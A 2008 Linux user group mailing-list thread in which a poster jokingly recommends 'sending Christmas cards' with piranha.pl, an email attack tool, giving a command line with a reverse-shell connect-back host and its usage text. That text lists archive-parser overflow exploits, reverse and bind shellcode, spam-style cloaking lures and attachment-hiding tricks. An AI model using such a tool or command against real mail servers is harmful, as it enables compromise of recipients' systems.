cryptworks said: > Date: Thu, 25 Dec 2008 13:03:10 -0700 > From: cryptworks@gmail.com > To: plug-discuss@lists.plug.phoenix.az.us > Subject: Re: HackFest Series: Email Christmas Cheer > > That's twisted but funny It's my job to educate ALL as we happily anesthetize each other (and Noob Linux Penguins) with how safe (and virus free) NIX is; someone must be the voice that reminds all that Linux is a powerful tool, to be wielded carefully and TRUST is the basis of ALL SECURITY. But you can trust me....really! www.Obnosis.com | http://en.wiktionary.org/wiki/Citations:obnosis | hackfest.obnosis.com (503)754-4452 January PLUG HackFest = Kristy Westphal, AZ Department of Economic Security Forensics @ UAT 1/10/09 12-3PM Take the Black [Linux/Vista-XP/OS X BackTrack3] Pill & leave SecurityMatrix, or take the Blue [XP/Vista Update] Pill & stay happily ignorant. > On 12/25/08, Lisa Kachold wrote: > > > > > > > > > > > > > > > > > > > > > > Send some Christmas cards: > > > > $ piranha.pl -e 4 -c 1 -l mynewshellhost -h mail.mydomain.com -a > > myname@mydomain.com > > > > > > Usage: piranha.pl [MANDATORY ARGS] [OPTIONAL ARGS] > > > > Mandatory arguments: > > -e+ Exploit number to use (See below) > > -h+ SMTP server to test > > -a+ Destination email address used in probing > > > > Optional arguments: > > -s+ Shellcode type to inject into exploits (See below) > > -c+ Cloaking style (See below) > > -d+ Try to vanish attachments from MUA's view (See below) > > -v Attach EICAR virus to improve stealthness > > -z Pack all the malware into a tarball to be less noisy > > -p+ Port to use in reverse shell or bind shell > > -l+ Host to connect back in reverse shell mode > > > > Valid exploits numbers: > > 0 OSVDB #5753: LHA get_header File Name Overflow > > 1 OSVDB #5754: LHA get_header Directory Name Overflow > > 2 OSVDB #6456: file readelf.c tryelf() ELF Header Overflow > > 3 OSVDB #11695: unarj Filename Handling Overflow > > 4 OSVDB #23460: ZOO combine File and Dir name overflow > > 5 OSVDB #15867: Convert UUlib uunconc integer overflow > > 6 OSVDB #XXX: ZOO next offset infinite loop DoS > > > > Valid shellcode types: > > 0 TCP reverse shell > > 1 UDP reverse shell > > 2 TCP bind shell > > > > Valid cloaking styles (consult whitepaper for visual result): > > 0 No cloaking at all (default) > > 1 Viagra spam message > > 2 "Look at the pictures I promised you!" > > > > Vanishing techniques for attachments: > > 0 No vanishing at all (default) > > 1 Multipart/alternative trick > > 2 trick > > > > www.Obnosis.com | http://en.wiktionary.org/wiki/Citations:obnosis | > > hackfest.obnosis.com (503)754-4452 > > January PLUG HackFest = Kristy Westphal, AZ Department of Economic Security > > Forensics @ UAT 1/10/09 12-3PM > > Take the Black [Linux XP/Vista BackTrack3] Pill & leave SecurityMatrix, or > > take the Blue [XP/Vista Update] Pill & stay happily ignorant. > > > > http://uncyclopedia.wikia.com/wiki/Satan_Claus > > _________________________________________________________________ > > Send e-mail anywhere. No map, no compass. > > http://windowslive.com/oneline/hotmail?ocid=TXT_TAGLM_WL_hotmail_acq_anywhere_122008 > > -- > Sent from my mobile device > > A mouse trap, placed on top of your alarm clock, will prevent you from > rolling over and going back to sleep after you hit the snooze button. > > Stephen > --------------------------------------------------- > PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us > To subscribe, unsubscribe, or to change your mail settings: > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss _________________________________________________________________ It’s the same Hotmail®. If by “same” you mean up to 70% faster. http://windowslive.com/online/hotmail?ocid=TXT_TAGLM_WL_hotmail_acq_broad1_122008